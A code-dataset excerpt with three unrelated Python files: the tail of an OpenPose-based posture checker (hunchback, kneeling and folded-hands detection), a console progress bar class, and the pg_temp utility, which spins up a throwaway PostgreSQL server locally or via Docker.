heatmap = np.squeeze(output_blobs[1]) # output 1 is heatmaps
heatmap = cv2.resize(heatmap, (0, 0), fx=model_params['stride'], fy=model_params['stride'],
interpolation=cv2.INTER_CUBIC)
heatmap = heatmap[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3],
:]
heatmap = cv2.resize(heatmap, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
paf = np.squeeze(output_blobs[0]) # output 0 is PAFs
paf = cv2.resize(paf, (0, 0), fx=model_params['stride'], fy=model_params['stride'],
interpolation=cv2.INTER_CUBIC)
paf = paf[:imageToTest_padded.shape[0] - pad[2], :imageToTest_padded.shape[1] - pad[3], :]
paf = cv2.resize(paf, (oriImg.shape[1], oriImg.shape[0]), interpolation=cv2.INTER_CUBIC)
heatmap_avg = heatmap_avg + heatmap / len(multiplier)
paf_avg = paf_avg + paf / len(multiplier)
all_peaks = [] #To store all the key points which a re detected.
peak_counter = 0
prinfTick(1) #prints time required till now.
for part in range(18):
map_ori = heatmap_avg[:, :, part]
map = gaussian_filter(map_ori, sigma=3)
map_left = np.zeros(map.shape)
map_left[1:, :] = map[:-1, :]
map_right = np.zeros(map.shape)
map_right[:-1, :] = map[1:, :]
map_up = np.zeros(map.shape)
map_up[:, 1:] = map[:, :-1]
map_down = np.zeros(map.shape)
map_down[:, :-1] = map[:, 1:]
peaks_binary = np.logical_and.reduce(
(map >= map_left, map >= map_right, map >= map_up, map >= map_down, map > params['thre1']))
peaks = list(zip(np.nonzero(peaks_binary)[1], np.nonzero(peaks_binary)[0])) # note reverse
peaks_with_score = [x + (map_ori[x[1], x[0]],) for x in peaks]
id = range(peak_counter, peak_counter + len(peaks))
peaks_with_score_and_id = [peaks_with_score[i] + (id[i],) for i in range(len(id))]
all_peaks.append(peaks_with_score_and_id)
peak_counter += len(peaks)
connection_all = []
special_k = []
mid_num = 10
prinfTick(2) #prints time required till now.
print()
position = checkPosition(all_peaks) #check position of spine.
checkKneeling(all_peaks) #check whether kneeling oernot
checkHandFold(all_peaks) #check whether hands are folding or not.
canvas1 = draw(input_image,all_peaks) #show the image.
return canvas1 , position
def draw(input_image, all_peaks):
canvas = cv2.imread(input_image) # B,G,R order
for i in range(18):
for j in range(len(all_peaks[i])):
cv2.circle(canvas, all_peaks[i][j][0:2], 4, colors[i], thickness=-1)
return canvas
def checkPosition(all_peaks):
try:
f = 0
if (all_peaks[16]):
a = all_peaks[16][0][0:2] #Right Ear
f = 1
else:
a = all_peaks[17][0][0:2] #Left Ear
b = all_peaks[11][0][0:2] # Hip
angle = calcAngle(a,b)
degrees = round(math.degrees(angle))
if (f):
degrees = 180 - degrees
if (degrees<70):
return 1
elif (degrees > 110):
return -1
else:
return 0
except Exception as e:
print("person not in lateral view and unable to detect ears or hip")
#calculate angle between two points with respect to x-axis (horizontal axis)
def calcAngle(a, b):
try:
ax, ay = a
bx, by = b
if (ax == bx):
return 1.570796
return math.atan2(by-ay, bx-ax)
except Exception as e:
print("unable to calculate angle")
def checkHandFold(all_peaks):
try:
if (all_peaks[3][0][0:2]):
try:
if (all_peaks[4][0][0:2]):
distance = calcDistance(all_peaks[3][0][0:2],all_peaks[4][0][0:2]) #distance between right arm-joint and right palm.
armdist = calcDistance(all_peaks[2][0][0:2], all_peaks[3][0][0:2]) #distance between left arm-joint and left palm.
if (distance < (armdist + 100) and distance > (armdist - 100) ): #this value 100 is arbitary. this shall be replaced with a calculation which can adjust to different sizes of people.
print("Not Folding Hands")
else:
print("Folding Hands")
except Exception as e:
print("Folding Hands")
except Exception as e:
try:
if(all_peaks[7][0][0:2]):
distance = calcDistance( all_peaks[6][0][0:2] ,all_peaks[7][0][0:2])
armdist = calcDistance(all_peaks[6][0][0:2], all_peaks[5][0][0:2])
# print(distance)
if (distance < (armdist + 100) and distance > (armdist - 100)):
print("Not Folding Hands")
else:
print("Folding Hands")
except Exception as e:
print("Unable to detect arm joints")
def calcDistance(a,b): #calculate distance between two points.
try:
x1, y1 = a
x2, y2 = b
return math.hypot(x2 - x1, y2 - y1)
except Exception as e:
print("unable to calculate distance")
def checkKneeling(all_peaks):
f = 0
if (all_peaks[16]):
f = 1
try:
if(all_peaks[10][0][0:2] and all_peaks[13][0][0:2]): # if both legs are detected
rightankle = all_peaks[10][0][0:2]
leftankle = all_peaks[13][0][0:2]
hip = all_peaks[11][0][0:2]
leftangle = calcAngle(hip,leftankle)
leftdegrees = round(math.degrees(leftangle))
rightangle = calcAngle(hip,rightankle)
rightdegrees = round(math.degrees(rightangle))
if (f == 0):
leftdegrees = 180 - leftdegrees
rightdegrees = 180 - rightdegrees
if (leftdegrees > 60 and rightdegrees > 60): # 60 degrees is trail and error value here. We can tweak this accordingly and results will vary.
print ("Both Legs are in Kneeling")
elif (rightdegrees > 60):
print ("Right leg is kneeling")
elif (leftdegrees > 60):
print ("Left leg is kneeling")
else:
print ("Not kneeling")
except IndexError as e:
try:
if (f):
a = all_peaks[10][0][0:2] # if only one leg (right leg) is detected
else:
a = all_peaks[13][0][0:2] # if only one leg (left leg) is detected
b = all_peaks[11][0][0:2] #location of hip
angle = calcAngle(b,a)
degrees = round(math.degrees(angle))
if (f == 0):
degrees = 180 - degrees
if (degrees > 60):
print ("Both Legs Kneeling")
else:
print("Not Kneeling")
except Exception as e:
print("legs not detected")
def showimage(img): #sometimes opencv will oversize the image when using using `cv2.imshow()`. This function solves that issue.
screen_res = 1280, 720 #my screen resolution.
scale_width = screen_res[0] / img.shape[1]
scale_height = screen_res[1] / img.shape[0]
scale = min(scale_width, scale_height)
window_width = int(img.shape[1] * scale)
window_height = int(img.shape[0] * scale)
cv2.namedWindow('image', cv2.WINDOW_NORMAL)
cv2.resizeWindow('image', window_width, window_height)
cv2.imshow('image', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
def prinfTick(i): #Time calculation to keep a trackm of progress
toc = time.time()
print ('processing time%d is %.5f' % (i,toc - tic))
if __name__ == '__main__': #main function of the program
tic = time.time()
print('start processing...')
model = get_testing_model()
model.load_weights('./model/keras/model.h5')
vi=False
if(vi == False):
time.sleep(2)
params, model_params = config_reader()
canvas, position= process('./sample_images/straight_flip.jpg', params, model_params)
showimage(canvas)
if (position == 1):
print("Hunchback")
elif (position == -1):
print ("Reclined")
else:
print("Straight")
``` |
{
"source": "joichirou/progressbar",
"score": 3
} |
#### File: progressbar/progressbar/drawConsole.py
```python
import datetime
import sys
class DrawConsole:
def __init__(self):
self.bar = ""
self.bar_tip = ""
self.finish_message = ""
def update(self, model):
u"""drawing progress bar
model: observer class
"""
bar_length = self.get_bar_length(model.value)
sys.stdout.flush()
sys.stdout.write(
"\r[%s%%]%s%s" %
(model.value,
(self.bar * int(bar_length)),
self.bar_tip))
if (model.value >= 100):
print("\n%s" % self.finish_message)
def get_bar_length(self, value):
bar_length = (value / 5)
if (bar_length == 0):
return 1
if (bar_length <= 20):
return bar_length
else:
return 20
``` |
{
"source": "joidegn/pg_temp",
"score": 3
} |
#### File: pg_temp/pg_temp/pg_temp.py
```python
import itertools
import os
import sys
import atexit
import shutil
import subprocess
import tempfile
import time
import pwd
from contextlib import contextmanager
import shlex
import warnings
# Module level TempDB singleton
temp_db = None
# Module constants
DEFAULT_DOCKER_EXE = 'docker'
DOCKER_INTERNAL_SOCK_DIR = '/var/run/postgresql'
FALLBACK_DOCKER_IMG = 'postgres'
DEFAULT_POSTGRES = 'postgres'
DEFAULT_INITDB = 'initdb'
DEFAULT_PSQL = 'psql'
DEFAULT_CREATEUSER = 'createuser'
def flatten(listOfLists):
return itertools.chain.from_iterable(listOfLists)
def init_temp_db(*args, **kwargs):
global temp_db
if not temp_db:
temp_db = TempDB(*args, **kwargs)
atexit.register(cleanup)
return temp_db
def cleanup():
if not temp_db:
return
temp_db.cleanup()
class PGSetupError(Exception):
pass
class TempDB(object):
def __init__(self,
databases=None,
verbosity=1,
retry=5,
tincr=1.0,
docker_img=None,
initdb=DEFAULT_INITDB,
postgres=DEFAULT_POSTGRES,
psql=DEFAULT_PSQL,
createuser=DEFAULT_CREATEUSER,
dirname=None,
sock_dir=None,
options=None):
"""Initialize a temporary Postgres database
:param databases: list of databases to create
:param verbosity: verbosity level, larger values are more verbose
:param retry: number of times to retry a connection
:param tincr: how much time to wait between retries
:param docker_img: specify a docker image for postgres
:param initdb: path to `initdb`, defaults to first in $PATH
:param postgres: path to `postgres`, defaults to first in $PATH
:param psql: path to `psql`, defaults to first in $PATH
:param createuser: path to `createuser`, defaults to first in $PATH
:param dirname: override temp data directory generation and create the
db in `dirname`
:param sock_dir: specify the postgres socket directory
:param options: a dictionary of configuration params and values
passed to `postgres` with `-c`
"""
self.verbosity = verbosity
self.docker_prefix = None
self.docker_container = None
self.docker_img = docker_img
# check for a postgres install, or fallback to docker
self._get_docker_fallback(postgres)
self.pg_process = None
# we won't expose this yet
self.run_as = self._get_run_as_account(None)
self.current_user = pwd.getpwuid(os.geteuid()).pw_name
options = dict() if not options else options
self._setup(databases, retry, tincr, initdb, postgres, sock_dir,
psql, createuser, dirname, options)
def _get_docker_fallback(self, postgres_exe):
if self.docker_img:
# already using docker
return
if postgres_exe != DEFAULT_POSTGRES:
# exe was specified explicitly so don't use a fallback
return
if not shutil.which(DEFAULT_POSTGRES):
has_docker = shutil.which(DEFAULT_DOCKER_EXE)
if not has_docker:
raise PGSetupError("Unable to locate a postgres installation")
warnings.warn("Unable to locate a postgres install. "
"Attempting fallback to docker...")
self.docker_img = FALLBACK_DOCKER_IMG
def _setup_docker_prefix(self, *args, mode='init'):
if mode == 'init':
self.docker_prefix = [DEFAULT_DOCKER_EXE, 'run', '--rm', '-e',
'POSTGRES_HOST_AUTH_METHOD=trust',
'--user=postgres']
elif mode == 'exec':
self.docker_prefix = [DEFAULT_DOCKER_EXE,
'exec', '--user=postgres', *args]
def _get_run_as_account(self, run_as):
if run_as:
try:
return pwd.getpwnam(run_as)
except KeyError:
raise PGSetupError("Can't locate user {}!".format(run_as,))
current_euid = os.geteuid()
if current_euid == 0:
# If running as root, try to run the db server creation as postgres
# user (assumed to exist)
try:
return pwd.getpwnam('postgres')
except KeyError:
raise PGSetupError("Can't create DB server as root, and "
"there's no postgres user!")
return None
@contextmanager
def _do_run_as(self):
if not self.run_as:
yield
return
current_euid = os.geteuid()
current_egid = os.getegid()
try:
os.setegid(self.run_as.pw_gid)
os.seteuid(self.run_as.pw_uid)
yield
finally:
os.seteuid(current_euid)
os.setegid(current_egid)
def _user_subshell(self, cmd):
# Note: we can't just seteuid because the postgres server process
# checks that euid == uid and that euid is not 0
# http://doxygen.postgresql.org/main_8c.html#a0bd2ee2e17615192912a97c16f908ac2
# and, if we set both uid and euid to non-zero, we won't be able to
# switch back. Instead we must run in a child process with both uid and
# euid set -- hence, `su`.
if not self.run_as:
return cmd
return ['su', '-', 'postgres', '-c',
' '.join(shlex.quote(c) for c in cmd)]
def stdout(self, level):
"""Return file handle for stdout for the current verbosity"""
if level > self.verbosity:
return subprocess.DEVNULL
else:
return sys.stdout
def stderr(self, level):
"""Return file handle for stderr for the current verbosity"""
if level > self.verbosity:
return subprocess.DEVNULL
else:
return sys.stderr
def printf(self, msg, level=1):
if level > self.verbosity:
return
print(msg)
def run_cmd(self, cmd, level=0, bg=False):
if self.docker_prefix:
cmd = self.docker_prefix + cmd
else:
cmd = self._user_subshell(cmd)
self.printf("Running %s" % str(' '.join(cmd)))
p = subprocess.Popen(cmd, stdout=self.stdout(level),
stderr=self.stderr(level))
if bg:
return p
p.communicate()
return p.returncode == 0
def _setup(self, databases, retry, tincr, initdb, postgres, sock_dir,
psql, createuser, dirname, options):
databases = databases or []
try:
self.printf("Creating temp PG server...")
with self._do_run_as():
self._setup_directories(dirname, sock_dir)
if self.docker_img:
self._setup_docker_prefix(mode='init')
self.create_db_server(initdb, postgres, options)
if self.docker_img:
self._setup_docker_prefix(self.docker_container, mode='exec')
self._real_pg_socket_dir = self.pg_socket_dir
self.pg_socket_dir = DOCKER_INTERNAL_SOCK_DIR
self.test_connection(psql, retry, tincr)
self.create_user(createuser)
self.create_databases(psql, databases)
if self.docker_img:
self.pg_socket_dir = self._real_pg_socket_dir
self.printf("done")
self.printf("(Connect on: `psql -h %s`)" % self.pg_socket_dir)
except Exception:
self.cleanup()
raise
def _setup_directories(self, dirname, sock_dir):
self.pg_temp_dir = None
if not dirname:
self.pg_temp_dir = tempfile.mkdtemp(prefix='pg_tmp_')
dirname = self.pg_temp_dir
self.pg_data_dir = os.path.join(dirname, 'data')
os.mkdir(self.pg_data_dir)
if not sock_dir:
self.pg_socket_dir = os.path.join(dirname, 'socket')
os.mkdir(self.pg_socket_dir)
# this is mainly needed in the case of docker so that that docker
# image's internal posgres user has write access to the socket dir
os.chmod(self.pg_socket_dir, 0o777)
else:
self.pg_socket_dir = sock_dir
def create_db_server(self, initdb, postgres, options):
if not self.docker_prefix:
rc = self.run_cmd([initdb, self.pg_data_dir], level=2)
if not rc:
raise PGSetupError("Couldn't initialize temp PG data dir")
options = ['%s=%s' % (k, v) for (k, v) in options.items()]
if self.docker_prefix:
_, cidfile = tempfile.mkstemp()
os.unlink(cidfile)
cmd = ['-d', '--cidfile', cidfile,
'-v', self.pg_socket_dir + ':' + DOCKER_INTERNAL_SOCK_DIR,
self.docker_img,
postgres, '-F', '-T', '-h', '']
bg = False
else:
cmd = [postgres, '-F', '-T', '-D', self.pg_data_dir,
'-k', self.pg_socket_dir, '-h', '']
bg = True
cmd += flatten(zip(itertools.repeat('-c'), options))
self.pg_process = self.run_cmd(cmd, level=2, bg=bg)
if self.docker_prefix:
with open(cidfile) as f:
self.docker_container = f.read()
os.unlink(cidfile)
def test_connection(self, psql, retry, tincr):
# test connection
cmd = [psql, '-d', 'postgres', '-h', self.pg_socket_dir, '-c', r"\dt"]
for i in range(retry):
time.sleep(tincr)
rc = self.run_cmd(cmd, level=2)
if rc:
break
else:
raise PGSetupError("Couldn't start PG server")
return rc
def create_user(self, createuser):
cmd = [createuser, '-h', self.pg_socket_dir, self.current_user, '-s']
rc = self.run_cmd(cmd, level=2)
if not rc:
# maybe the user already exists, and that's ok
pass
return rc
def create_databases(self, psql, databases):
rc = True
for db in databases:
cmd = [psql, '-d', 'postgres', '-h', self.pg_socket_dir,
'-c', "create database %s;" % db]
rc = rc and self.run_cmd(cmd, level=2)
if not rc:
raise PGSetupError("Couldn't create databases")
return rc
def cleanup(self):
if self.docker_container:
subprocess.run([DEFAULT_DOCKER_EXE, 'kill', self.docker_container],
stdout=subprocess.DEVNULL)
elif self.pg_process:
self.pg_process.kill()
self.pg_process.wait()
for d in [self.pg_temp_dir]:
if d:
shutil.rmtree(d, ignore_errors=True)
``` |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.